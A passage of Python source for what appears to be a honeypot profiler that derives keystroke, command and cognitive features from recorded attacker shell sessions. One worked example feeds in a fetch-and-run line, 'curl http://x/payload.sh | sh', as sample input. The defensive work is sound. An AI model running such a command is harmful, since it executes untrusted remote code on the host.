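            gap_too_long = last_t is not None and (t - last_t) > PASTE_MAX_GAP_S
            if cur is None or gap_too_long:
                if cur is not None:
                    bursts.append(tuple(cur))
                cur = [t, t, 0, 0]
            cur[1] = t
            cur[2] += len(data)
            cur[3] += 1
        elif cur is not None:
            # A short (typed) event always closes the open burst.
            bursts.append(tuple(cur))
            cur = None
        last_t = t
    if cur is not None:
        bursts.append(tuple(cur))
    return bursts


events = [
    (0.00, "i", "l"),
    (0.10, "i", "s"),
    (1.00, "i", "curl http://x"),     # 13 chars: paste-class
    (1.01, "i", "/payload.sh | sh"),  # 16 chars, 10 ms later: same burst
    (3.00, "i", "echo done"),         # 9 chars, long gap: new burst
]
bursts = group_paste_bursts(events)
```

With these assumed thresholds the five events collapse into two bursts: one of two events and 29 characters, and one of a single event and 9 characters.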
_BACKSPACE_CHARS = ("\x7f", "\x08")
_KILL_LINE_CHARS = ("\x15", "\x17")
def _scan_correction_signals(
inputs: list[AsciinemaEvent],
) -> tuple[int, tuple[float, ...], int]:
"""Walk input events char-by-char, count backspaces / kill-lines /
timing IATs.
PII discipline: only counts and IATs leave this function — no
character data is retained or returned.
"""
backspace_count = 0
kill_line_count = 0
iats: list[float] = []
last_non_bs_t: float | None = None
for t, _kind, data in inputs:
for c in data:
if c in _BACKSPACE_CHARS:
backspace_count += 1
if last_non_bs_t is not None:
iats.append(max(0.0, t - last_non_bs_t))
elif c in _KILL_LINE_CHARS:
kill_line_count += 1
last_non_bs_t = t
else:
last_non_bs_t = t
return backspace_count, tuple(iats), kill_line_count
def _split_typing_bursts(iats: tuple[float, ...]) -> tuple[tuple[float, ...], ...]:
"""Split a flat IAT sequence at gaps > IKI_THINK_MAX_S.
Drops bursts of fewer than 3 IATs — too short to compute a stable
CV. Mirrors BEHAVE prototype's ``_split_into_bursts``.
"""
bursts: list[list[float]] = [[]]
for x in iats:
if x > IKI_THINK_MAX_S:
if bursts[-1]:
bursts.append([])
else:
bursts[-1].append(x)
return tuple(tuple(b) for b in bursts if len(b) >= 3)
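
A small worked example may make the splitting rule concrete. This sketch assumes a think-pause threshold of 2.0 seconds as a stand-in for `IKI_THINK_MAX_S`, whose actual value is not shown in this diff; `split_bursts` is a hypothetical name.

```python
THINK_PAUSE_S = 2.0  # assumed stand-in for IKI_THINK_MAX_S


def split_bursts(iats, min_len=3):
    """Split IATs at think-pauses and drop bursts shorter than min_len."""
    bursts = [[]]
    for x in iats:
        if x > THINK_PAUSE_S:
            # The pause itself is discarded; it only marks a boundary.
            if bursts[-1]:
                bursts.append([])
        else:
            bursts[-1].append(x)
    return [b for b in bursts if len(b) >= min_len]


iats = [0.1, 0.2, 0.15, 5.0, 0.1, 0.1, 9.0, 0.2, 0.3, 0.25, 0.2]
result = split_bursts(iats)
```

Here the two-element middle burst is dropped, which leaves the first and last runs as the only bursts long enough for a coefficient of variation.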
def _segment_commands(inputs: list[AsciinemaEvent]) -> tuple[Command, ...]:
"""Walk input events, splitting on ``\\r`` / ``\\n`` into commands.
Retains only the first whitespace-delimited token as a sha256 hash
plus three integer counters needed for the Phase C
``motor.shell_mastery.*`` primitives:
* ``tab_count`` — ``\\t`` (0x09) keystrokes in the command
* ``shortcut_count`` — readline control bytes from
:data:`SHORTCUT_CTRL_BYTES`
* ``pipe_count`` — ``|`` characters in the command (counted on
every byte; pasted pipelines still indicate pipeline fluency the
operator chose to execute)
Buffer contents are dropped on every command boundary; an
unterminated trailing buffer (no final newline) yields no command.
"""
cmds: list[Command] = []
buf_chars: list[str] = []
buf_start_ts: float | None = None
tab_count = 0
shortcut_count = 0
pipe_count = 0
for t, _kind, data in inputs:
for c in data:
if c in ("\r", "\n"):
if buf_chars:
text = "".join(buf_chars).strip()
first_token = text.split(maxsplit=1)[0] if text else ""
cmds.append(Command(
start_ts=buf_start_ts if buf_start_ts is not None else t,
end_ts=t,
first_token_hash=hash_token(first_token),
tab_count=tab_count,
shortcut_count=shortcut_count,
pipe_count=pipe_count,
))
buf_chars = []
buf_start_ts = None
tab_count = 0
shortcut_count = 0
pipe_count = 0
else:
if not buf_chars:
buf_start_ts = t
buf_chars.append(c)
if c == "\t":
tab_count += 1
elif c == "|":
pipe_count += 1
elif c in SHORTCUT_CTRL_BYTES:
shortcut_count += 1
return tuple(cmds)
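
The segmentation walk can be exercised on a few synthetic events. The sketch below makes several assumptions: `segment` is a hypothetical simplification that returns plain tuples, the token hash is taken to be an unsalted SHA-256 hex digest (the real `hash_token` may differ), and `SHORTCUTS` is an assumed stand-in for `SHORTCUT_CTRL_BYTES`.

```python
import hashlib

# Assumed stand-in for SHORTCUT_CTRL_BYTES: Ctrl-A, Ctrl-E, Ctrl-K.
SHORTCUTS = frozenset({"\x01", "\x05", "\x0b"})


def segment(events):
    """Return (first_token_sha256, tabs, shortcuts, pipes) per command."""
    cmds = []
    buf = []
    tabs = shortcuts = pipes = 0
    for _t, _kind, data in events:
        for c in data:
            if c in ("\r", "\n"):
                if buf:
                    text = "".join(buf).strip()
                    token = text.split(maxsplit=1)[0] if text else ""
                    digest = hashlib.sha256(token.encode()).hexdigest()
                    cmds.append((digest, tabs, shortcuts, pipes))
                # Drop the raw text at every command boundary.
                buf = []
                tabs = shortcuts = pipes = 0
            else:
                buf.append(c)
                if c == "\t":
                    tabs += 1
                elif c == "|":
                    pipes += 1
                elif c in SHORTCUTS:
                    shortcuts += 1
    return cmds


events = [
    (0.0, "i", "ps aux"),
    (0.5, "i", " | grep ssh\r"),
    (1.0, "i", "ls\t\r"),
    (2.0, "i", "unfinished"),  # no terminator, so no command is emitted
]
commands = segment(events)
```

Only the digest and the three counters survive each boundary, which is the property the docstring relies on for its PII discipline.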
def _annotate_commands_with_output(
commands: tuple[Command, ...],
outputs: list[AsciinemaEvent],
) -> tuple[tuple[Command, ...], tuple[PromptLine, ...]]:
"""Re-emit ``commands`` with output-derived fields filled.
Returns ``(commands, prompt_lines)``. Each ``Command`` gains
``errored``, ``output_bytes``, and ``followed_by_prompt`` (Step
F.0). The flattened tuple of all detected ``PromptLine`` instances
across every command's window is returned alongside for the caller
to install on ``SessionContext.prompt_lines``.
The output window for ``commands[i]`` spans from its ``end_ts``
(the ``\\r``/``\\n`` that ran it) to the ``start_ts`` of the next
command. The last command's window is open-ended (``math.inf``)
so output events arriving at or after ``t_end`` are still captured.
"""
if not commands:
return commands, ()
annotated: list[Command] = []
all_prompts: list[PromptLine] = []
for i, cmd in enumerate(commands):
win_end = commands[i + 1].start_ts if i + 1 < len(commands) else math.inf
byte_count, errored, prompts = _output_window(outputs, cmd.end_ts, win_end)
all_prompts.extend(prompts)
annotated.append(Command(
start_ts=cmd.start_ts,
end_ts=cmd.end_ts,
first_token_hash=cmd.first_token_hash,
tab_count=cmd.tab_count,
shortcut_count=cmd.shortcut_count,
pipe_count=cmd.pipe_count,
errored=errored,
output_bytes=byte_count,
followed_by_prompt=bool(prompts),
))
return tuple(annotated), tuple(all_prompts)
def _per_command_iats(
commands: tuple[Command, ...],
inputs: list[AsciinemaEvent],
) -> tuple[tuple[float, ...], ...]:
"""Per-command IATs between consecutive input events whose
timestamps fall in ``[cmd.start_ts, cmd.end_ts)``.
Excludes the terminator IAT (the last event at ``cmd.end_ts`` is
the ``\\r``/``\\n`` itself). Returns one tuple per command.
"""
out: list[tuple[float, ...]] = []
for cmd in commands:
prev_t: float | None = None
cmd_iats: list[float] = []
for t, _kind, _data in inputs:
if t < cmd.start_ts or t >= cmd.end_ts:
continue
if prev_t is not None:
cmd_iats.append(max(0.0, t - prev_t))
prev_t = t
out.append(tuple(cmd_iats))
return tuple(out)
def _output_bytes_between(
outputs: list[AsciinemaEvent],
start: float,
end: float,
) -> int:
"""Total ``len(d)`` of output events with ``start <= t < end``."""
return sum(len(d) for t, _k, d in outputs if start <= t < end)
def _typed_char_histograms(
inputs: list[AsciinemaEvent],
) -> tuple[Mapping[str, int], Mapping[str, int], int, _LexCounters]:
"""Walk input events, build typed-only unigram + bigram histograms
plus the Phase G lexical counters.
Skip paste-class events (``len(data) >= PASTE_MIN_CHARS_PER_EVENT``)
— pasted text reveals nothing about the operator's keyboard or
sentiment. Letter bigrams chain only across consecutive ASCII-letter
chars; a digit or punctuation character breaks the chain.
Lexical counters (G.0): a small word buffer (≤ ``LEXEME_MAX_LEN``)
accumulates ASCII-letter chars (case-folded). On any non-letter
boundary, every suffix of the buffer is checked against
``POSITIVE_LEXEMES`` / ``NEGATIVE_LEXEMES`` / ``OBSCENITY_LEXEMES``;
the longest match wins (so ``fucking`` counts as one obscenity hit,
not two — ``fuck`` + ``fucking``). Caps and bang runs are tracked
in the same walk.
Returns ``(unigrams, bigrams, total_letters, lex_counters)``.
"""
unigrams: dict[str, int] = {}
bigrams: dict[str, int] = {}
total_letters = 0
last_letter: str | None = None
word_buf: list[str] = []
obscenity_hits = 0
positive_lex_hits = 0
negative_lex_hits = 0
caps_run_cur = 0
caps_run_max = 0
bang_run_cur = 0
bang_run_max = 0
def _flush_word() -> tuple[int, int, int]:
"""Match longest lexeme suffix in ``word_buf``; return per-set deltas."""
if not word_buf:
return 0, 0, 0
s = "".join(word_buf)
# Longest-suffix scan against fixed lexicons.
for length in range(min(len(s), LEXEME_MAX_LEN), 0, -1):
suffix = s[-length:]
if suffix in OBSCENITY_LEXEMES:
return 1, 0, 0
if suffix in POSITIVE_LEXEMES:
return 0, 1, 0
if suffix in NEGATIVE_LEXEMES:
return 0, 0, 1
return 0, 0, 0
for _t, _kind, data in inputs:
if len(data) >= PASTE_MIN_CHARS_PER_EVENT:
# Paste boundary breaks every running counter.
last_letter = None
obs_d, pos_d, neg_d = _flush_word()
obscenity_hits += obs_d
positive_lex_hits += pos_d
negative_lex_hits += neg_d
word_buf.clear()
caps_run_cur = 0
bang_run_cur = 0
continue
for c in data:
# Caps-run tracking
if c.isascii() and c.isupper():
caps_run_cur += 1
if caps_run_cur > caps_run_max:
caps_run_max = caps_run_cur
else:
caps_run_cur = 0
# Bang-run tracking
if c == "!":
bang_run_cur += 1
if bang_run_cur > bang_run_max:
bang_run_max = bang_run_cur
else:
bang_run_cur = 0
# Histogram + lexeme buffering
if c.isascii() and c.isalpha():
lower = c.lower()
unigrams[lower] = unigrams.get(lower, 0) + 1
total_letters += 1
if last_letter is not None:
big = last_letter + lower
bigrams[big] = bigrams.get(big, 0) + 1
last_letter = lower
word_buf.append(lower)
if len(word_buf) > LEXEME_MAX_LEN:
# Slide window — only the tail can match a lexeme.
word_buf[:] = word_buf[-LEXEME_MAX_LEN:]
else:
last_letter = None
obs_d, pos_d, neg_d = _flush_word()
obscenity_hits += obs_d
positive_lex_hits += pos_d
negative_lex_hits += neg_d
word_buf.clear()
# Trailing word (no boundary at end of input).
obs_d, pos_d, neg_d = _flush_word()
obscenity_hits += obs_d
positive_lex_hits += pos_d
negative_lex_hits += neg_d
if len(bigrams) > LAYOUT_BIGRAM_TOP_N:
top = sorted(bigrams.items(), key=lambda kv: -kv[1])[:LAYOUT_BIGRAM_TOP_N]
bigrams = dict(top)
return unigrams, bigrams, total_letters, _LexCounters(
obscenity_hits=obscenity_hits,
positive_lex_hits=positive_lex_hits,
negative_lex_hits=negative_lex_hits,
caps_run_max=caps_run_max,
bang_run_max=bang_run_max,
)
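
The longest-suffix scan in `_flush_word` can be shown in isolation. In this sketch the vocabularies and `MAX_LEN` are made-up placeholders, not the contents of `_intent.py`, and `classify_word` is a hypothetical helper that returns a label instead of per-set deltas.

```python
# Placeholder vocabularies; the real lexicons live in _intent.py.
POSITIVE = frozenset({"nice", "yes"})
NEGATIVE = frozenset({"damn", "ugh"})
MAX_LEN = 4  # assumed stand-in for LEXEME_MAX_LEN


def classify_word(word):
    """Return the label of the longest matching suffix, or None."""
    s = word.lower()
    # Try the longest candidate suffix first, then shrink.
    for length in range(min(len(s), MAX_LEN), 0, -1):
        suffix = s[-length:]
        if suffix in POSITIVE:
            return "positive"
        if suffix in NEGATIVE:
            return "negative"
    return None


labels = [classify_word(w) for w in ("ohyes", "UGH", "ls")]
```

Each flushed word yields at most one hit, because the loop returns on the first (longest) suffix that belongs to any vocabulary.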
def _output_window(
outputs: list[AsciinemaEvent],
start: float,
end: float,
) -> tuple[int, bool, tuple[PromptLine, ...]]:
"""Walk output events in ``[start, end)`` once.
Returns ``(byte_count, errored, prompt_lines)``. ``byte_count`` is
the raw byte count (pre-strip); ``errored`` is the canonical-error
-pattern match over the ANSI-stripped concatenation;
``prompt_lines`` is the tuple of PS1 lines detected in the same
stripped text (Step F.0).
PII trade-off (Phase F): the stripped text itself is dropped on
return, but ``prompt_lines`` retains PS1 strings (capped at
``PROMPT_LINE_MAX_CHARS``). Only derived values leave the engine
via observations; the prompt strings live on ``SessionContext``
so F.1 / F.3 / E.4 can read them.
"""
chunks: list[str] = []
last_ts = start
byte_count = 0
for t, _k, d in outputs:
if start <= t < end:
byte_count += len(d)
chunks.append(d)
last_ts = t
if not chunks:
return 0, False, ()
stripped = strip_ansi("".join(chunks))
errored = detect_error_in_output(stripped)
prompts = tuple(extract_prompt_lines(
stripped, base_ts=last_ts, max_chars=PROMPT_LINE_MAX_CHARS,
))
return byte_count, errored, prompts
def build_session_context(
events: Iterable[AsciinemaEvent],
*,
sid: str,
source: str,
evidence_ref: str | None = None,
) -> SessionContext:
"""Single-pass build of the SessionContext for ``events``."""
inputs: list[AsciinemaEvent] = []
outputs: list[AsciinemaEvent] = []
t_first: float | None = None
t_last: float = 0.0
for ev in events:
t, kind, _ = ev
if t_first is None:
t_first = t
if t > t_last:
t_last = t
if kind == "i":
inputs.append(ev)
elif kind == "o":
outputs.append(ev)
if t_first is None:
t_start = 0.0
t_end = 0.0
else:
t_start = t_first
t_end = t_last
iats: tuple[float, ...] = tuple(
max(0.0, inputs[i][0] - inputs[i - 1][0]) for i in range(1, len(inputs))
)
paste_bursts, paste_count = _detect_paste_bursts(inputs)
typing_bursts = _split_typing_bursts(iats)
backspace_count, backspace_iats, kill_line_count = _scan_correction_signals(inputs)
commands = _segment_commands(inputs)
commands, prompt_lines = _annotate_commands_with_output(commands, outputs)
inter_cmd_iats = tuple(
max(0.0, commands[i + 1].start_ts - commands[i].end_ts)
for i in range(len(commands) - 1)
)
output_per_cmd = tuple(
_output_bytes_between(outputs, commands[i].end_ts, commands[i + 1].start_ts)
for i in range(len(commands) - 1)
)
intra_command_iats = _per_command_iats(commands, inputs)
typed_uni, typed_bi, typed_letters, lex = _typed_char_histograms(inputs)
return SessionContext(
sid=sid,
source=source,
evidence_ref=evidence_ref or f"session:{sid}",
t_start=t_start,
t_end=t_end,
duration_s=max(0.0, t_end - t_start),
input_events=tuple(inputs),
output_events=tuple(outputs),
iats=iats,
paste_bursts=paste_bursts,
paste_event_count=paste_count,
commands=commands,
inter_cmd_iats=inter_cmd_iats,
output_per_cmd=output_per_cmd,
typing_bursts=typing_bursts,
backspace_count=backspace_count,
backspace_iats=backspace_iats,
kill_line_count=kill_line_count,
intra_command_iats=intra_command_iats,
prompt_lines=prompt_lines,
typed_unigram_counts=typed_uni,
typed_bigram_counts=typed_bi,
typed_letter_count=typed_letters,
obscenity_hits=lex.obscenity_hits,
positive_lex_hits=lex.positive_lex_hits,
negative_lex_hits=lex.negative_lex_hits,
caps_run_max=lex.caps_run_max,
bang_run_max=lex.bang_run_max,
)


@@ -0,0 +1,104 @@
"""Registered feature functions.
Each entry takes a ``SessionContext`` and yields zero or more
``Observation`` instances. Adding a primitive = adding a function in a
sibling module and appending it to ``FEATURES``.
"""
from __future__ import annotations
from typing import Callable, Iterable
from behave_core.spec.envelope import Observation
from decnet.profiler.behave_shell._ctx import SessionContext
from decnet.profiler.behave_shell._features.cognitive import (
cognitive_load,
command_branch_diversity,
error_resilience_fallback_to_man,
error_resilience_frustration_typing,
error_resilience_retry_tactic,
exploration_style,
feedback_loop_engagement,
planning_depth,
tool_vocabulary,
inter_command_consistency,
inter_command_latency_class,
)
from decnet.profiler.behave_shell._features.emotional_valence import (
arousal,
frustration_venting,
stress_response,
valence,
)
from decnet.profiler.behave_shell._features.environmental import (
keyboard_layout,
locale,
numpad_usage,
shell_type,
terminal_multiplexer,
)
from decnet.profiler.behave_shell._features.operational import (
cleanup_behavior,
multi_actor_indicators,
objective,
opsec_discipline,
)
from decnet.profiler.behave_shell._features.temporal import (
escalation_pattern,
exit_behavior,
landing_ritual,
session_duration,
)
from decnet.profiler.behave_shell._features.motor import (
command_chunking,
error_correction,
input_modality,
keystroke_cadence,
motor_stability,
paste_burst_rate,
pipe_chaining_depth,
shortcut_usage,
tab_completion,
)
FeatureFn = Callable[[SessionContext], Iterable[Observation]]
FEATURES: tuple[FeatureFn, ...] = (
input_modality,
paste_burst_rate,
keystroke_cadence,
motor_stability,
error_correction,
command_chunking,
tab_completion,
shortcut_usage,
pipe_chaining_depth,
inter_command_latency_class,
command_branch_diversity,
feedback_loop_engagement,
inter_command_consistency,
cognitive_load,
exploration_style,
planning_depth,
tool_vocabulary,
error_resilience_retry_tactic,
error_resilience_frustration_typing,
error_resilience_fallback_to_man,
session_duration,
escalation_pattern,
landing_ritual,
exit_behavior,
shell_type,
terminal_multiplexer,
locale,
keyboard_layout,
numpad_usage,
objective,
opsec_discipline,
cleanup_behavior,
multi_actor_indicators,
valence,
arousal,
stress_response,
frustration_venting,
)
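
How an engine might consume a registry of this shape is sketched below. Everything here is a stand-in: `Ctx` and `Obs` are hypothetical substitutes for `SessionContext` and `Observation`, the two feature functions and their primitive names are invented for the example, and `run_features` is only an assumption about how `extract_session` could iterate the tuple.

```python
from dataclasses import dataclass
from typing import Callable, Iterable, Iterator


@dataclass(frozen=True)
class Ctx:
    """Stand-in for SessionContext."""
    duration_s: float
    n_commands: int


@dataclass(frozen=True)
class Obs:
    """Stand-in for the Observation envelope."""
    primitive: str
    value: object


def duration_feature(ctx: Ctx) -> Iterator[Obs]:
    yield Obs("example.duration", ctx.duration_s)


def command_count_feature(ctx: Ctx) -> Iterator[Obs]:
    # A feature may emit nothing when its input is missing.
    if ctx.n_commands == 0:
        return
    yield Obs("example.command_count", ctx.n_commands)


FeatureFn = Callable[[Ctx], Iterable[Obs]]
FEATURES: tuple[FeatureFn, ...] = (duration_feature, command_count_feature)


def run_features(ctx: Ctx) -> Iterator[Obs]:
    """Call every registered feature once and chain the results."""
    for fn in FEATURES:
        yield from fn(ctx)


observations = list(run_features(Ctx(duration_s=12.5, n_commands=0)))
```

Registering a feature as a generator function keeps "no observation" cheap to express: the function simply returns before yielding.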


@@ -0,0 +1,32 @@
"""Helper for building registry-valid :class:`Observation` records.
Every feature module would otherwise repeat the same Window /
source / evidence_ref boilerplate. This helper centralises it and is
the one place to reach when emission semantics change (e.g. when we
start parametrising windows on a per-primitive basis).
"""
from __future__ import annotations
from typing import Any
from behave_core.spec.envelope import Observation, Window
from decnet.profiler.behave_shell._ctx import SessionContext
def make_observation(
ctx: SessionContext,
*,
primitive: str,
value: Any,
confidence: float,
) -> Observation:
"""Build one :class:`Observation` for the whole-session window."""
return Observation(
primitive=primitive,
value=value,
confidence=confidence,
window=Window(start_ts=ctx.t_start, end_ts=ctx.t_end),
source=ctx.source,
evidence_ref=ctx.evidence_ref,
)


@@ -0,0 +1,593 @@
"""``cognitive.*`` feature functions.
Step 5: ``cognitive.inter_command_latency_class``.
Step 6: ``cognitive.command_branch_diversity``.
Step 7: ``cognitive.feedback_loop_engagement``.
Step 8: ``cognitive.inter_command_consistency``.
Step D.1: ``cognitive.cognitive_load``.
"""
from __future__ import annotations
import statistics
from typing import Iterator
from behave_core.spec.envelope import Observation
from decnet.profiler.behave_shell._ctx import SessionContext
from decnet.profiler.behave_shell._features._emit import make_observation
from decnet.profiler.behave_shell._parse import hash_token
from decnet.profiler.behave_shell._thresholds import (
BRANCH_DIVERSITY_LINEAR_MIN,
COGNITIVE_LOAD_CHUNKING_REF_CV,
COGNITIVE_LOAD_LOW_MAX,
COGNITIVE_LOAD_MEDIUM_MAX,
COGNITIVE_LOAD_PACE_REF_CV,
EXPLORATION_CHAOTIC_BACKTRACK_MIN,
EXPLORATION_TARGETED_REP_MIN,
FEEDBACK_CORRELATION_MIN,
FEEDBACK_MIN_PAIRS,
FRUSTRATION_LOW_MAX,
FRUSTRATION_MODERATE_MAX,
IKI_THINK_MAX_S,
INTER_CMD_DELIBERATE_MAX,
INTER_CMD_INSTANT_MAX,
INTER_CMD_LLM_HEAVYWEIGHT_MAX,
INTER_CMD_LLM_LIGHTWEIGHT_MAX,
INTER_CMD_TYPING_MAX,
MIN_COMMANDS_FOR_FULL_CONFIDENCE,
PAUSE_CV_BIMODAL_MIN,
PAUSE_CV_METRONOMIC_MAX,
PLANNING_DEEP_MIN,
PLANNING_REACTIVE_MIN,
TOOL_VOCAB_BROAD_MIN,
TOOL_VOCAB_NARROW_MAX,
)
# Precomputed at import time so the per-session hot loop is a set
# membership check, not 3 sha256 ops per command. The ``--help`` /
# ``-h`` flag forms can't be detected here — they're not first tokens
# (PII discipline keeps only the *first* token's hash). v0.2 will
# reconsider once corpus calibration justifies storing arg-token
# hashes too.
_HELP_FAMILY_HASHES: frozenset[str] = frozenset({
hash_token("man"),
hash_token("help"),
hash_token("info"),
})


def _clip01(x: float) -> float:
    if x < 0.0:
        return 0.0
    if x > 1.0:
        return 1.0
    return x


def _cv(xs: tuple[float, ...] | list[float]) -> float | None:
    """Coefficient of variation; ``None`` if undefined (n < 2 or mean <= 0)."""
    if len(xs) < 2:
        return None
    mean = statistics.fmean(xs)
    if mean <= 0.0:
        return None
    return statistics.stdev(xs) / mean


def _bucket_inter_cmd_latency(median_iat: float) -> str:
    if median_iat <= INTER_CMD_INSTANT_MAX:
        return "instant"
    if median_iat <= INTER_CMD_TYPING_MAX:
        return "typing_speed"
    if median_iat <= INTER_CMD_DELIBERATE_MAX:
        return "deliberate"
    if median_iat <= INTER_CMD_LLM_LIGHTWEIGHT_MAX:
        return "llm_lightweight"
    if median_iat <= INTER_CMD_LLM_HEAVYWEIGHT_MAX:
        return "llm_heavyweight"
    return "long"


def inter_command_latency_class(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.inter_command_latency_class``.

    Operator's *thinking pace* between commands, bucketed against
    calibrated thresholds. Splits LW-sim / CLAUDE-FF / CLAUDE-CL.
    """
    if not ctx.inter_cmd_iats:
        return
    median_iat = statistics.median(ctx.inter_cmd_iats)
    bucket = _bucket_inter_cmd_latency(median_iat)
    # Sample-size honesty: < 5 commands → halve confidence
    if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        confidence = 0.40
    else:
        confidence = 0.80
    yield make_observation(
        ctx,
        primitive="cognitive.inter_command_latency_class",
        value=bucket,
        confidence=confidence,
    )


def command_branch_diversity(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.command_branch_diversity``.

    Content-based discriminator (no timing): unique first-token ratio
    over total commands. Splits CLAUDE-FF (linear_playbook) from
    CLAUDE-CL (adaptive_branching). The empirical anchor on
    2026-05-02: fire-and-forget runs ~10 distinct tools; closed-loop
    runs 5-6 with ``curl`` re-invoked as the operator chases threads.
    """
    n = len(ctx.commands)
    if n == 0:
        # No commands at all → nothing honest to say. Skip emission.
        return
    if n < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        # Registry admits "unknown"; absence of *enough* data is itself
        # a high-confidence answer.
        yield make_observation(
            ctx,
            primitive="cognitive.command_branch_diversity",
            value="unknown",
            confidence=1.0,
        )
        return
    unique = len({c.first_token_hash for c in ctx.commands})
    ratio = unique / n
    if ratio >= BRANCH_DIVERSITY_LINEAR_MIN:
        value = "linear_playbook"
    else:
        # Anything below the linear floor is treated as adaptive: the
        # operator is reusing tools, the discriminative signal we
        # actually want.
        value = "adaptive_branching"
    yield make_observation(
        ctx,
        primitive="cognitive.command_branch_diversity",
        value=value,
        confidence=0.80,
    )


def feedback_loop_engagement(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.feedback_loop_engagement``.

    Pearson correlation between ``output_per_cmd[i]`` (bytes the
    operator saw before the next command) and
    ``inter_cmd_iats[i]`` (the pause that followed). closed_loop
    operators pause longer after seeing more output; fire_and_forget
    operators pace independently of output. CUTS ACROSS the LLM/human
    axis: closed-loop LLMs and reading humans both score closed_loop.

    First primitive that depends on output events: with zero output
    events in the shard, or fewer than ``FEEDBACK_MIN_PAIRS`` pairs,
    emit ``unknown`` at confidence 1.0 (no honest correlation possible)
    and exit. A session with no commands at all emits nothing.
    """
    pairs = list(zip(ctx.output_per_cmd, ctx.inter_cmd_iats))
    if not ctx.output_events or len(pairs) < FEEDBACK_MIN_PAIRS:
        if not ctx.commands:
            return
        yield make_observation(
            ctx,
            primitive="cognitive.feedback_loop_engagement",
            value="unknown",
            confidence=1.0,
        )
        return
    xs = [float(p[0]) for p in pairs]
    ys = [float(p[1]) for p in pairs]
    try:
        r = statistics.correlation(xs, ys)
    except statistics.StatisticsError:
        # Constant series on either axis: correlation undefined.
        yield make_observation(
            ctx,
            primitive="cognitive.feedback_loop_engagement",
            value="unknown",
            confidence=1.0,
        )
        return
    if r > FEEDBACK_CORRELATION_MIN:
        value = "closed_loop"
    else:
        value = "fire_and_forget"
    yield make_observation(
        ctx,
        primitive="cognitive.feedback_loop_engagement",
        value=value,
        confidence=0.75,
    )


def error_resilience_fallback_to_man(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.error_resilience.fallback_to_man``.

    For each errored command, check whether the operator's next
    command is ``man`` / ``help`` / ``info``, i.e. they reached for
    the manual rather than re-trying or pivoting. If at least one
    errored command triggered this fallback → ``present``; otherwise
    ``absent``.

    Skip emission when no commands errored: the registry's binary
    value set has no ``unknown``, and emitting ``absent`` from no
    observation at all would be dishonest.

    The ``--help`` / ``-h`` flag forms can't fire this primitive in
    v0.1: they aren't first tokens, and the engine only retains
    ``first_token_hash`` per command (PII discipline). Filed for v0.2.
    """
    errored_indices = [i for i, c in enumerate(ctx.commands) if c.errored]
    if not errored_indices:
        return
    fallback_count = 0
    for i in errored_indices:
        if i + 1 >= len(ctx.commands):
            continue
        if ctx.commands[i + 1].first_token_hash in _HELP_FAMILY_HASHES:
            fallback_count += 1
    value = "present" if fallback_count > 0 else "absent"
    if len(errored_indices) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        confidence = 0.40
    else:
        confidence = 0.65
    yield make_observation(
        ctx,
        primitive="cognitive.error_resilience.fallback_to_man",
        value=value,
        confidence=confidence,
    )


def error_resilience_frustration_typing(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.error_resilience.frustration_typing``.

    Compares median within-command IAT for commands *following* an
    errored command against the same statistic for commands following
    a successful command. A large relative delta indicates the operator
    typed differently after a failure: speed-up (rage / fluency) or
    slowdown (caution); both are signs of arousal.

    Skip emission when either group is empty (no errors, or every
    command errored, leaving no clean baseline). Below the sample-size
    floor, confidence drops to 0.40.
    """
    post_err: list[float] = []
    post_ok: list[float] = []
    cmds = ctx.commands
    intra = ctx.intra_command_iats
    if len(cmds) < 2 or len(intra) != len(cmds):
        return
    for i in range(1, len(cmds)):
        cmd_iats = intra[i]
        if not cmd_iats:
            continue
        m = statistics.median(cmd_iats)
        if cmds[i - 1].errored:
            post_err.append(m)
        else:
            post_ok.append(m)
    if not post_err or not post_ok:
        return
    median_err = statistics.median(post_err)
    median_ok = statistics.median(post_ok)
    if median_ok <= 0.0:
        return
    delta = abs(median_err - median_ok) / median_ok
    if delta < FRUSTRATION_LOW_MAX:
        value = "low"
    elif delta < FRUSTRATION_MODERATE_MAX:
        value = "moderate"
    else:
        value = "high"
    if len(post_err) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        confidence = 0.40
    else:
        confidence = 0.60
    yield make_observation(
        ctx,
        primitive="cognitive.error_resilience.frustration_typing",
        value=value,
        confidence=confidence,
    )


def error_resilience_retry_tactic(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.error_resilience.retry_tactic``.

    For each command with ``Command.errored=True``, classify the
    operator's response by the *next* command:

    * **rerun**: same first_token_hash as the errored command. The
      operator re-invoked the same tool (often after fixing args
      mid-edit, but we can't see args).
    * **switch**: different first_token_hash. Pivoted to a different
      tool.
    * **abort**: no next command. Session ended after the error.

    The session's reported tactic is the **modal** response across all
    errored commands (with ties broken in registry order: rerun >
    modify > switch > abort). Skip emission entirely when no commands
    errored: the registry has no ``unknown`` here, and silence is the
    most honest answer.

    The ``modify`` value (edit-and-retry) requires within-command
    diffing of arg tokens, which crosses the PII boundary the engine
    holds (only ``first_token_hash`` is retained per command). v0.1
    therefore never emits ``modify``; v0.2 will once the PII trade-off
    is revisited against a real attacker corpus.
    """
    errored = [(i, c) for i, c in enumerate(ctx.commands) if c.errored]
    if not errored:
        return
    counts = {"rerun": 0, "switch": 0, "abort": 0}
    for i, cmd in errored:
        if i + 1 >= len(ctx.commands):
            counts["abort"] += 1
        elif ctx.commands[i + 1].first_token_hash == cmd.first_token_hash:
            counts["rerun"] += 1
        else:
            counts["switch"] += 1
    # Registry-order tiebreak (rerun > modify > switch > abort).
    # `modify` deferred: never increments here. max() returns the
    # first maximal key, so iterating in registry order breaks ties.
    order = ("rerun", "switch", "abort")
    value = max(order, key=lambda k: counts[k])
    if len(errored) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        confidence = 0.40
    else:
        confidence = 0.65
    yield make_observation(
        ctx,
        primitive="cognitive.error_resilience.retry_tactic",
        value=value,
        confidence=confidence,
    )


def tool_vocabulary(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.tool_vocabulary`` ∈ {narrow, moderate, broad}.

    Absolute count of distinct first_token_hashes. Skip emission when
    no commands exist; below the sample-size floor we still emit, but
    at confidence 0.40, since a session with few commands but five
